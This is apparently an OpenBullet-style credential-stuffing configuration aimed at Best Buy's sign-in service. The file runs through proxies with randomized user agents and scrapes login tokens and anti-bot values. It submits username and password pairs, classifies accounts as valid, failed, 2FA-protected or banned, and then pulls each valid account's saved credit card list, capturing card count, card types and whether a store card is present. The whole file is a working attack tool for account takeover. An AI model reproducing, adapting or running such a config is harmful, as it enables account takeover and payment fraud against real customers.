[SETTINGS]
{
  "Name": "BestBuy FulLCap",
  "SuggestedBots": 99,
  "MaxCPM": 0,
  "LastModified": "2022-12-08T13:26:44.3315317+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "BestBuy FulLCap-@D3v1LZoNE",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION RandomString "Mozilla/?d.?d (iPhone; CPU iPhone OS ?d_?d like Mac OS X) AppleWebKit/?d?d?d.1.?d?d (KHTML, like Gecko) Version/?d?d?d.?d?d?d Mobile/?d?dA?d?d?d" -> VAR "UA" 

REQUEST GET "https://www.bestbuy.com/identity/global/signin" AutoRedirect=FALSE ReadResponseSource=FALSE 
  
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "user-agent: <UA>" 

PARSE "<HEADERS(Location)>" LR "?token=" "" -> VAR "TOK" 

REQUEST GET "https://www.bestbuy.com/identity/signin?token=<TOK>" 
  
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "user-agent: <UA>" 

PARSE "<SOURCE>" LR "emailFieldName\":\"" "\"" -> VAR "EM" 

PARSE "<SOURCE>" LR "codeList\":[\"" "\"]" -> VAR "SRC" "" "\",\"" 

PARSE "<SRC>" LR "" "\",\"" -> VAR "PS" 

PARSE "<PS>" LR "" "X" -> VAR "PS2" 

PARSE "<SRC>" LR "X1h" "\"" -> VAR "PS3" 

FUNCTION Constant "<PS2>X1h" -> VAR "PS4" 

FUNCTION Constant "<PS4><PS3>" -> VAR "PassHASH" 

PARSE "<SOURCE>" LR "alpha\":" "]," -> VAR "APP" "" "]" 

PARSE "<APP>" LR "[\"" "\"" -> VAR "AP1" 

PARSE "<APP>" LR "<AP1>\",\"" "\"" -> VAR "AP2" 

PARSE "<APP>" LR "<AP2>\",\"" "\"" -> VAR "AP3" 

PARSE "<APP>" LR "<AP3>\",\"" "\"" -> VAR "AP4" 

PARSE "<APP>" LR "<AP4>\",\"" "\"" -> VAR "AP5" 

PARSE "<APP>" LR "<AP5>\",\"" "\"" -> VAR "AP6" 

FUNCTION Length "{\"token\":\"<TOK>\",\"loginMethod\":\"UID_PASSWORD\",\"flowOptions\":\"0000000000000000\",\"alpha\":\"<AP1>\",\"Salmon\":\"FA7F2\",\"<PassHASH>\":\"<PASS>\",\"<EM>\":\"<USER>\"}" -> VAR "len" 

REQUEST POST "https://www.bestbuy.com/identity/authenticate" 
  CONTENT "{\"token\":\"<TOK>\",\"loginMethod\":\"UID_PASSWORD\",\"flowOptions\":\"0000000000000000\",\"alpha\":\"<AP1>\",\"Salmon\":\"FA7F2\",\"<PassHASH>\":\"<PASS>\",\"<EM>\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-us" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: www.bestbuy.com" 
  HEADER "Origin: https://www.bestbuy.com" 
  HEADER "Referer: https://www.bestbuy.com/identity/signin?token=<TOK>" 
  HEADER "User-Agent: <UA>" 

IF "<SOURCE>" Contains "expired"
IF "<AP2>" NotEqualTo ""

REQUEST POST "https://www.bestbuy.com/identity/authenticate" 
  CONTENT "{\"token\":\"<TOK>\",\"loginMethod\":\"UID_PASSWORD\",\"flowOptions\":\"0000000000000000\",\"alpha\":\"<AP2>\",\"Salmon\":\"FA7F2\",\"<PassHASH>\":\"<PASS>\",\"<EM>\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-us" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: www.bestbuy.com" 
  HEADER "Origin: https://www.bestbuy.com" 
  HEADER "Referer: https://www.bestbuy.com/identity/signin?token=<TOK>" 
  HEADER "User-Agent: <UA>" 

ENDIF
IF "<SOURCE>" Contains "expired"
IF "<AP3>" NotEqualTo ""

REQUEST POST "https://www.bestbuy.com/identity/authenticate" 
  CONTENT "{\"token\":\"<TOK>\",\"loginMethod\":\"UID_PASSWORD\",\"flowOptions\":\"0000000000000000\",\"alpha\":\"<AP3>\",\"Salmon\":\"FA7F2\",\"<PassHASH>\":\"<PASS>\",\"<EM>\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-us" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: www.bestbuy.com" 
  HEADER "Origin: https://www.bestbuy.com" 
  HEADER "Referer: https://www.bestbuy.com/identity/signin?token=<TOK>" 
  HEADER "User-Agent: <UA>" 

ENDIF
IF "<SOURCE>" Contains "expired"
IF "<AP4>" NotEqualTo ""

REQUEST POST "https://www.bestbuy.com/identity/authenticate" 
  CONTENT "{\"token\":\"<TOK>\",\"loginMethod\":\"UID_PASSWORD\",\"flowOptions\":\"0000000000000000\",\"alpha\":\"<AP4>\",\"Salmon\":\"FA7F2\",\"<PassHASH>\":\"<PASS>\",\"<EM>\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-us" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: www.bestbuy.com" 
  HEADER "Origin: https://www.bestbuy.com" 
  HEADER "Referer: https://www.bestbuy.com/identity/signin?token=<TOK>" 
  HEADER "User-Agent: <UA>" 

ENDIF
IF "<SOURCE>" Contains "expired"
IF "<AP5>" NotEqualTo ""

REQUEST POST "https://www.bestbuy.com/identity/authenticate" 
  CONTENT "{\"token\":\"<TOK>\",\"loginMethod\":\"UID_PASSWORD\",\"flowOptions\":\"0000000000000000\",\"alpha\":\"<AP5>\",\"Salmon\":\"FA7F2\",\"<PassHASH>\":\"<PASS>\",\"<EM>\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-us" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: www.bestbuy.com" 
  HEADER "Origin: https://www.bestbuy.com" 
  HEADER "Referer: https://www.bestbuy.com/identity/signin?token=<TOK>" 
  HEADER "User-Agent: <UA>" 

ENDIF
IF "<SOURCE>" Contains "expired"
IF "<AP6>" NotEqualTo ""

REQUEST POST "https://www.bestbuy.com/identity/authenticate" 
  CONTENT "{\"token\":\"<TOK>\",\"loginMethod\":\"UID_PASSWORD\",\"flowOptions\":\"0000000000000000\",\"alpha\":\"<AP6>\",\"Salmon\":\"FA7F2\",\"<PassHASH>\":\"<PASS>\",\"<EM>\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-us" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: www.bestbuy.com" 
  HEADER "Origin: https://www.bestbuy.com" 
  HEADER "Referer: https://www.bestbuy.com/identity/signin?token=<TOK>" 
  HEADER "User-Agent: <UA>" 

ENDIF

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<COOKIES(at)>" Exists 
  KEYCHAIN Failure OR 
    KEY "The email or password did not match our records. Please try again" 
    KEY "We didn't find an account with that email address" 
    KEY "The password was incorrect" 
    KEY "The password was incorrect. Please try again" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "stepUpRequired" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "403" 

REQUEST GET "https://www.bestbuy.com/profile/rest/c/paymentinfo/creditcard/all" 
  
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-us" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: www.bestbuy.com" 
  HEADER "Origin: https://www.bestbuy.com" 
  HEADER "Referer: https://www.bestbuy.com/identity/signin?token=<TOK>" 
  HEADER "User-Agent: <UA>" 

FUNCTION CountOccurrences "CREDIT_CARD" "<SOURCE>" -> CAP "Cards" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Cards>" LessThan "0" 
    KEY "<Cards>" EqualTo "0" 

PARSE "<SOURCE>" LR "type\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Cards Type" 

IF "<SOURCE>" Contains "BESTBUYCONSUMER"

FUNCTION Constant "True" -> CAP "Store Card" 

ENDIF
IF "<SOURCE>" DoesNotContain "BESTBUYCONSUMER"

FUNCTION Constant "False" -> CAP "Store Card" 

ENDIF

